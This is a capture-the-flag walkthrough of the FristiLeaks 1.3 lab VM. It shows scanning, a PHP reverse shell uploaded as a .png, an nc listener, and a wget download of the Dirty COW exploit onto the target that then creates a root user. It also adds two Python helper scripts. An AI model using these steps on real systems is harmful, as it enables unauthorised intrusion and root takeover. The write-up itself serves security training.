
FRISTILEAKS:1.3 Walkthrough

Reconnaissance

Host Discovery

$ netdiscover
4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.50.129  08:00:27:a5:a6:76      1      60  PCS Systemtechnik GmbH 

Port Scanning

$ nmap -A -sV -sC 192.168.50.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-21 12:29 EDT
Nmap scan report for 192.168.50.129
Host is up (0.00096s latency).
Not shown: 989 filtered tcp ports (no-response), 10 filtered tcp ports (host-prohibited)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
| http-robots.txt: 3 disallowed entries 
|_/cola /sisi /beer
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|media device|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), Drobo embedded (89%), Synology DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.96 ms 192.168.50.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.47 seconds

Enumeration

HTTP Enumeration

Visiting the site turned up nothing of note. Viewing the page source revealed one extra path; it held only two images and nothing worth exploiting either.


So I ran nikto against the host.

$ nikto -h 192.168.50.129 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.50.129
+ Target Hostname:    192.168.50.129
+ Target Port:        80
+ Start Time:         2024-06-21 12:38:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ /: Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/beer/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cola/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/sisi/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.3.3 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.3 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8911 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2024-06-21 12:39:19 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto's output points at five directories: /beer, /cola, /sisi, /icons and /images. Visiting them, /beer, /cola and /sisi all return the same image.

After a while I recalled that the home page reads "Keep Calm and Drink Fristi", and the directories found above are also drink names, so I tried the path /fristi and landed on a login page.


Exploitation

A few weak passwords failed to log in. The page source, however, contains a developer comment that looks like a username, eezeepz, together with a base64-encoded image, so I decoded that next.

Logging in with those hints, username eezeepz and password keKkeKKeKKeKkEkkEk, succeeded and led to a file upload page.

Uploading an arbitrary file produced an error saying that only png, jpg and gif files are accepted.

So I took a PHP reverse shell, changed its extension to .png, and the upload went through. With a listener running on the attacking machine, requesting the uploaded file gave me a shell.
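The comment-and-base64 step above, as an added example that is not part of the original walkthrough: a small Python script that pulls every HTML comment out of saved page source, decodes any comment that is a whitespace-wrapped base64 blob, checks the leading bytes against the PNG/JPEG/GIF signatures, and writes the image to disk so it can be opened and read. The page source, the username comment and the image bytes embedded in the script are constructed for the demo (the "image" is only a PNG signature followed by zeros); against the real page you pass the saved HTML file as the first argument.

```python
"""Pull base64 blobs out of HTML comments and save any that decode to an image.

Added example for the /fristi login-page step; not code from the original
walkthrough. SAMPLE_HTML below is constructed: the comment text mimics the kind
of developer note described in the post, and the image is a PNG signature plus
zero bytes, not the real picture.
"""
import base64
import binascii
import re
import sys
import textwrap

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# File signatures for the three types the upload form later accepts.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

_FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed, not a real image

SAMPLE_HTML = """<html><body>
<!-- TODO: clean this up before release. Left some junk in here for testing.
     - by eezeepz -->
<form method="post">...</form>
<!--
%s
-->
</body></html>
""" % "\n".join(textwrap.wrap(base64.b64encode(_FAKE_PNG).decode(), 16))


def decode_b64(text):
    """Return decoded bytes if text (ignoring whitespace) looks like base64, else None."""
    compact = "".join(text.split())
    if len(compact) < 24 or not B64_RE.match(compact):
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except binascii.Error:
        return None


def sniff(data):
    """Map leading bytes to an image extension, or None if not a known image."""
    for sig, ext in MAGIC.items():
        if data.startswith(sig):
            return ext
    return None


def harvest(html):
    """Split HTML comments into plain notes and decoded images.

    Returns {'notes': [comment text, ...], 'images': [(ext, bytes), ...]}.
    """
    notes, images = [], []
    for comment in (m.group(1) for m in COMMENT_RE.finditer(html)):
        data = decode_b64(comment)
        ext = sniff(data) if data else None
        if ext:
            images.append((ext, data))
        else:
            notes.append(comment.strip())
    return {"notes": notes, "images": images}


def main(path=None):
    html = open(path, encoding="utf-8", errors="replace").read() if path else SAMPLE_HTML
    found = harvest(html)
    for note in found["notes"]:
        print("comment:", " ".join(note.split()))
    for i, (ext, data) in enumerate(found["images"], 1):
        out = f"leak_{i}.{ext}"
        with open(out, "wb") as fh:
            fh.write(data)
        print(f"wrote {out} ({len(data)} bytes); open it and read whatever it shows")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

Save the login page with curl or the browser and run `python3 harvest.py fristi.html` (file names are mine); anything base64 that is not an image is left in the notes list rather than silently dropped, since a comment can just as well hide text.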

$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.50.128] from (UNKNOWN) [192.168.50.129] 54555
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 22:05:53 up  1:38,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$ 

Privilege Escalation

Check the kernel version:

#Target Terminal
sh-4.1$ cat /proc/version
Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015

The kernel is 2.6.32, so use searchsploit to look for a usable exploit; here we use Dirty COW, 40839.c.

#Kali Linux Terminal
$ searchsploit Linux 2.6.32 Privilege Dirty COW
------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                          |  Path
------------------------------------------------------------------------ ---------------------------------
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race C | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition P | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Conditio | linux/local/40839.c
------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
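The version check above, as an added example (not the walkthrough's own code): the searchsploit titles say 2.6.22 < 3.9, but upstream the race was only fixed in 4.8.3 (with backports to the 4.7 and 4.4 stable series), and a distribution kernel such as CentOS 6's 2.6.32 has to be judged by its vendor build number, not by the upstream base version. The Python below parses the /proc/version line from the target and applies those cut-offs. The RHEL/CentOS 6 fixed build it uses (2.6.32-642.6.2.el6, RHSA-2016:2105) is quoted from memory and marked as an assumption in the code; verify it against the advisory before relying on it.

```python
"""Classify a /proc/version string against the Dirty COW (CVE-2016-5195) window.

Added example for this walkthrough, not code from the original post or from the
exploit author. Upstream cut-offs (4.8.3, 4.7.9, 4.4.26) are the stable releases
that carried the fix; the CentOS/RHEL 6 cut-off is an ASSUMPTION
(2.6.32-642.6.2.el6, RHSA-2016:2105) to be checked against the advisory.
"""
import re
import sys

# The /proc/version line captured from the target in the walkthrough.
TARGET_PROC_VERSION = (
    "Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) "
    "(gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015"
)

FIRST_VULNERABLE = (2, 6, 22)          # the bug arrived in 2.6.22
# Upstream stable series -> first point release with the fix.
UPSTREAM_FIXED = {(4, 8): (4, 8, 3), (4, 7): (4, 7, 9), (4, 4): (4, 4, 26)}
FIXED_FROM = (4, 9, 0)                 # every later mainline release is fixed
# ASSUMPTION: first RHEL/CentOS 6 build carrying the backport (RHSA-2016:2105).
EL6_FIXED_BUILD = (642, 6, 2)

VERSION_RE = re.compile(r"Linux version (\d+)\.(\d+)\.(\d+)(?:-([\d.]+)\.el(\d+))?")


def parse_version(proc_version):
    """Return ((major, minor, patch), vendor build tuple or None, el release or None)."""
    m = VERSION_RE.search(proc_version)
    if not m:
        raise ValueError("no 'Linux version x.y.z' found")
    base = tuple(int(x) for x in m.group(1, 2, 3))
    build = tuple(int(x) for x in m.group(4).split(".")) if m.group(4) else None
    el = int(m.group(5)) if m.group(5) else None
    return base, build, el


def dirty_cow_status(proc_version):
    """Return 'vulnerable', 'patched' or 'unknown' (vendor kernel not in the table)."""
    base, build, el = parse_version(proc_version)
    if base < FIRST_VULNERABLE or base >= FIXED_FROM:
        return "patched"
    if el is not None:
        # Enterprise kernels keep the old base version and backport fixes, so the
        # upstream number alone says nothing; compare the vendor build instead.
        if el == 6 and base == (2, 6, 32) and build is not None:
            return "vulnerable" if build < EL6_FIXED_BUILD else "patched"
        return "unknown"
    series = base[:2]
    if series in UPSTREAM_FIXED:
        return "vulnerable" if base < UPSTREAM_FIXED[series] else "patched"
    # Other series inside the window (e.g. 4.5, 4.6) went EOL without the fix, or are
    # older LTS lines whose individual point releases would need checking.
    return "vulnerable"


def main():
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else TARGET_PROC_VERSION
    base, build, el = parse_version(text)
    label = ".".join(map(str, base))
    if build is not None:
        label += "-" + ".".join(map(str, build)) + f".el{el}"
    print(f"kernel {label}: {dirty_cow_status(text)}")


if __name__ == "__main__":
    main()
```

On the target, `python cow_check.py /proc/version` (script name is mine) gives the verdict for the running kernel; with no argument it evaluates the line quoted from the walkthrough.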

Move into /tmp, download 40839.c, read the build instructions in the source comments, then compile and run it. The exploit asks for a password for the new user; I left it empty. Then switch to the firefart user it created.

#Target Terminal
sh-4.1$ cd /tmp
sh-4.1$ wget http://192.168.50.128/40839.c
sh-4.1$ gcc -pthread 40839.c -o dirty -lcrypt
sh-4.1$ ./dirty
./dirty
Please enter the new password: 
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:figsoZwws4Zu6:0:0:pwned:/root:/bin/bash

mmap: 7ffa62027000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password ''.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

su firefart
standard in must be a tty   # no tty: spawn one with Python
python -c 'import pty; pty.spawn("/bin/sh")'
sh-4.1$ su firefart
su firefart
Password: 
[firefart@localhost tmp]#

Listing the files under /root yields the flag. As the exploit output reminds you, restore the original password file afterwards with mv /tmp/passwd.bak /etc/passwd.


This post is licensed under CC BY 4.0 by the author.
